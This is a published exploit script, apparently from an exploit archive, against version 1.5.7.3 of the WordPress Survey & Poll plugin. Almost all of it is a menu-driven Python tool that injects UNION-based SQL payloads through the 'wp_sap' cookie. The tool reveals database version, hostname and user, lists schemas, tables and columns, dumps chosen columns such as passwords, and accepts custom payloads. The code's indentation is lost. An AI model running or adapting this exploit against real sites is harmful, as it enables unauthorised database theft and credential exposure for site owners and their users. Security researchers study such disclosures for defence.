Authored by Mohin Paramasivam

WordPress Survey and Poll plugin version 1.5.7.3 suffers from a remote SQL injection vulnerability.

# Exploit Title: WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)
# Date: 2021-09-07
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://modalsurvey.pantherius.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip
# Version: 1.5.7.3
# Tested on: MariaDB,MYSQL

#!/usr/bin/python3

import requests
import re
import warnings
from bs4 import BeautifulSoup, CData
import sys
import argparse
import os
import time
from termcolor import colored
import validators

#Install all the requirements

"""
pip3 install requests
pip3 install bs4
pip3 install argparse
pip3 install termcolor
pip3 install validators

"""


parser = argparse.ArgumentParser(description='WP Plugin Survey & Poll V1.5.7.3 SQL Injection (sss_params)')
parser.add_argument('-u',help='Poll & Survey page URL')
args = parser.parse_args()

url = args.u


if len(sys.argv) !=3:
parser.print_help(sys.stderr)
sys.exit()

if not validators.url(url):
print(colored("rnEnter URL with http:// or https://rn",'red'))
parser.print_help(sys.stderr)
sys.exit()


def currect_db_name():
payload= """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,database(),11#"]"""
inject(payload)


def db_version():
payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]"""
inject(payload)


def hostname():
payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@hostname,11#"]"""
inject(payload)


def current_user():
payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,user(),11#"]"""
inject(payload)


def list_databases():
payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(schema_name),11 from information_schema.schemata#"]"""
inject(payload)

def list_tables_db():
db = input("rnDatabase : ")
payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(table_name),11 from information_schema.tables where table_schema='%s'#"]""" %(db)
inject(payload)


def list_columns_db():
db = input("rnDatabase : ")
table = input("Table : ")
payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(column_name),11 from information_schema.columns where table_schema='%s' and table_name='%s'#"]""" %(db,table)
inject(payload)


def dump_db():
db = input("rnDatabase: ")
table = input("Table: ")
column = input("Columns Eg: users,password : ")
dump = "%s.%s" %(db,table)
payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(%s),11 from %s.%s#"]""" %(column,db,table)
inject(payload)


def custom_payload():
payload = input("rnPayload : ")
inject(payload)

def inject(inject_payload):

request = requests.Session()

cookies = {
'wp_sap': inject_payload,

}
print("rn"+colored("Sending Payload :",'red')+" %srn" %colored((inject_payload),'green'))
response = request.get(url,cookies=cookies)
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
soup = BeautifulSoup(response.text,features="lxml")
cdata = soup.find(text=re.compile("CDATA"))
split_cdata = list(cdata.split(':'))
output = split_cdata[11]
print("rn"+colored("SQLI OUTPUT :",'red')+" %srn" %colored((output),'green'))
time.sleep(1)
main()



def main():
print ("Automated SQL Injector (wp-survey-and-poll)")
print ("Enter the respective number to select option")
print ("#EXAMPLE Option : 1rn")



print("Option 1 : Grab Database Version")
print("Option 2 : Get Current Database Name")
print("Option 3 : Get Hostname ")
print("Option 4 : Get Current User")
print("Option 5 : List All Databases")
print("Option 6 : List Tables From Database")
print("Option 7 : List Columns from Tables")
print("Option 8 : Dump Database")
print("Option 9 : Custom Payload")
print("Option 10 : Exit")


print("rn")
option_selected = str(input("Select Option : "))


if(option_selected=="1"):
db_version()

if(option_selected=="2"):
currect_db_name()

if(option_selected=="3"):
hostname()

if(option_selected=="4"):
current_user()

if(option_selected=="5"):
list_databases()

if(option_selected=="6"):
list_tables_db()

if(option_selected=="7"):
list_columns_db()

if(option_selected=="8"):
dump_db()

if(option_selected=="9"):
custom_payload()

if(option_selected=="10"):
sys.exit()

else:
main()

main()